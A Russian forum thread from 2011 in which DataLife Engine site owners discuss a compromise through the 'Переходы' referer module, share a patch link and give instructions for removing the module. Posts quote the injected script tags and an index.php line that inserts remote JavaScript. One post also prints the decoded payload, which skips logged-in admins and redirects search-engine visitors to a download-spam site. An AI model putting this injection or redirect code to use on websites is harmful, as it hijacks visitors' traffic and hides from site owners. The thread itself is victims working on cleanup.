Помощник
|
Вирус на сайте (фишинговая ссылка) |
Jester |
2.8.2011, 21:37;
Ответить: Jester
Сообщение
#12
|
|
Вот исправления_http://jester-soft.ws/script/dle/dle_bugs/197276-vse-versii-nedostatochnaya-filtraciya-v-module-perehody.html
Заплаток нет, стояла последняя версия, кстати с проплаченной лицензией. Пришлось снести переходы на всех сайтах, на сайте разработчика та же проблема. Заплатка есть! |
|
|
writerman |
3.8.2011, 2:22;
Ответить: writerman
Сообщение
#13
|
|
Вы представьте у меня сегодня поже ломанули через модуль "переходы 8.9" в модуле был скрипт
<script src=http://p07a.chat.ru/c.js></script> а в модуле он выглядит так cake%3Cscript%20src=http://p07a.chat.ru/c.js%3E%3C%2Fscript%3E он какбы переманивает посетителей посещаемость упала совсем... поставил заплатки но не помагает, эта гадость cake%3Cscript%20src=http://p07a.chat.ru/c.js%3E%3C%2Fscript%3E появлятся практически через 30 мин после её удаления... Помогите!!! Прошу Вас! Сообщение отредактировал writerman - 3.8.2011, 2:23 -------------------- |
|
|
balboa
|
Сообщение
#14
|
|
появлятся практически через 30 мин после её удаления... Помогите!!! Прошу Вас! Мне ТП на хостинге изменил права на запись файла 444. Сам менять теперь не могу. Это помогло блокировать авто-изменение файла скриптом. -------------------- |
|
|
Lenka |
3.8.2011, 2:32;
Ответить: Lenka
Сообщение
#15
|
|
Видимо, программист модуля хитрый попался...
-------------------- |
|
|
writerman |
3.8.2011, 3:43;
Ответить: writerman
Сообщение
#16
|
||
|
И вот сново!
еще и шаблон в придачу портит..... вот что вноутри етого скрипта if(dle_admin == '' || dle_login_hash == ''){document.write(unescape("%3Cscript%20type%3D%22text/javascript%22%3Esp_redirect%20%3D%20%7B%7D%3Bsp_redirect.searchers%20%3D%20%5B%20%5B/google%5C./i%2C%20/%28%5C%3F%7C%26%29q%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%20%5B/search%5C.yahoo%5C./i%2C%20/%28%5C%3F%7C%26%29p%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%20%5B/bing%5C.com/i%2C%20/%28%5C%3F%7C%26%29q%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%20%5B/search%5C.aol%5C./i%2C%20/%28%5C%3F%7C%26%29q%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%20%5B/ask%5C.com/i%2C%20/%28%5C%3F%7C%26%29q%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%20%5B/altavista%5C./i%2C%20/%28%5C%3F%7C%26%29q%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%20%5B/search%5C.lycos%5C./i%2C%20/%28%5C%3F%7C%26%29query%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%20%5B/alltheweb%5C./i%2C%20/%28%5C%3F%7C%26%29q%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%20%5B/yandex%5C./i%2C%20/%28%5C%3F%7C%26%29text%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%20%5B/%28nova%5C.%7Csearch%5C.%29%3Frambler%5C./i%2C%20/%28%5C%3F%7C%26%29query%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%20%5B/gogo%5C./i%2C%20/%28%5C%3F%7C%26%29q%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%20%5B/go%5C.mail%5C./i%2C%20/%28%5C%3F%7C%26%29q%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%20%5B/nigma%5C./i%2C%20/%28%5C%3F%7C%26%29s%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%5D%3Bsp_redirect.sp_redirect%20%3D%20function%28referer%29%20%7B%20var%20query%3Dnull%3B%20for%28var%20i%3D0%3B%20i%3Csp_redirect.searchers.length%3B%20i++%29%20%7B%20%20var%20se%20%3D%20sp_redirect.searchers%5Bi%5D%3B%20%20if%20%28referer.match%28se%5B0%5D%29%29%20%7B%20%20%20query%20%3D%20referer.match%28se%5B1%5D%29%5Bse%5B2%5D%5D%3B%20%20%20break%3B%20%20%7D%20%7D%20if%28query%20%21%3D%20null%29%20%7B%20document.location.href%3D%27http%3A//skachayfiles.archivstufffile.ru/%27+%27%3Fwkey%3D753766%27+%27%27+%28query%3F%20%27%26query%3D%27+query%20%3A%20%27%27%29%3B%7D%20%7D%3Bsp_redirect.sp_redirect%28document.referrer%29%3B%3C/script%3E"));} Короче нужно улалять модуль так прощё будет.... Ребята, Вы не поверитена моем втором сайте тот же скрипт! Удаляйте модуль переходы!!!!! Вот вам инстукция (для тех кто может быть не знает как удалить модуль) Физической пользы от данного модуля абсолютно нет. Удаление модуля переходы: Удаляем всё из папки engine файлы: ajax\referer.php data\referer.conf.php , referer.perf.php inc\referer.php, include\referer.init.php modules\referer.php skins\images\referer.png referer\*.* install-referer.php Открываем /index.php Ищем: require_once ROOT_DIR . '/engine/init.php'; На следующей строке удаляем: require_once ENGINE_DIR . '/modules/referer.php'; Ищем: $tpl->set ( '{calendar}', $tpl->result['calendar'] ); На предыдущей строке удаляем: $tpl->set ( '{referer}', $referer_block ); { Откройте /templates/<НУЖНЫЙ ШАБЛОН>/main.tpl Удалите тег: {referer} Запустите phpmyadmin и выполните запрос: DROP TABLE IF EXISTS dle_referer; или удалите таблицу dle_referer в ручную. Если пригодилось то кнопка спасибо будет кстати=) -------------------- |
||
|
|||
Maereo |
3.8.2011, 9:20;
Ответить: Maereo
Сообщение
#17
|
|
|
|
|
bmp104 |
3.8.2011, 9:32;
Ответить: bmp104
Сообщение
#18
|
|
Ребята, Вы не поверитена моем втором сайте тот же скрипт! Ну еще бы, вы ведь его один и тот же устанавливали, качали нуллед версию? |
|
|
writerman |
3.8.2011, 10:53;
Ответить: writerman
Сообщение
#19
|
|
Вот исправления_http://jester-soft.ws/script/dle/dle_bugs/197276-vse-versii-nedostatochnaya-filtraciya-v-module-perehody.html Заплатка есть! Спасибо! Помогло! У меня стоял модуль Переходов 8.9 на этом сайте написано что P.S: дистриб Переходов 8.9, данный фикс там уже есть И я пробовал все багфиксы ставить не помогает через 30 мин после установки фиксов скрипт сново на сайте... Ребята, Вы не поверитена моем втором сайте тот же скрипт! Ну еще бы, вы ведь его один и тот же устанавливали, качали нуллед версию? Нет не один и тот же на втором сайте Версия 8.4 -------------------- |
|
|
StAlKeR-xXl |
3.8.2011, 11:00;
Ответить: StAlKeR-xXl
Сообщение
#20
|
|
DLE - зло...
но приносит бабло |
|
|
balboa
|
Сообщение
#21
|
|
Вот код фишинговой ссылки из index.php
echo $tpl->result['main'] = preg_replace('~(<body.*?>)~ism','$1<script src=http://promediagroup.ru/d.js></script>', $tpl->result['main']);
-------------------- |
|
|
|
Похожие темы
Тема | Ответов | Автор | Просмотров | Последний ответ | |
---|---|---|---|---|---|
Быстрый и качественный обмен на сайте Baksman.org Обмен Bitcoin, BTC-e, PM, Qiwi, Yandex money, Карты банк |
52 | Baksman | 33586 | Вчера, 5:02 автор: Baksman |
|
Боты могут делать пушподписки на моём сайте? | 0 | Megaspryt | 437 | 17.4.2024, 23:29 автор: Megaspryt |
|
CryptoCloud — прием USDT, BTC, ETH, LTC на любом сайте | 36 | CryptoCLoud | 10638 | 16.4.2024, 16:02 автор: CryptoCLoud |
|
Странный трафик на сайте длительное время | 33 | TABAK | 8768 | 12.4.2024, 5:56 автор: Skyworker |
|
Вечные ссылки с 300+ СДЛов, тиц до 750, ЯКи, DMOZ, от 1$/ссылка вечные ссылки |
259 | SeoUaSales | 129207 | 30.3.2024, 18:27 автор: Hillel_Silver |
Текстовая версия | Сейчас: 19.4.2024, 16:39 |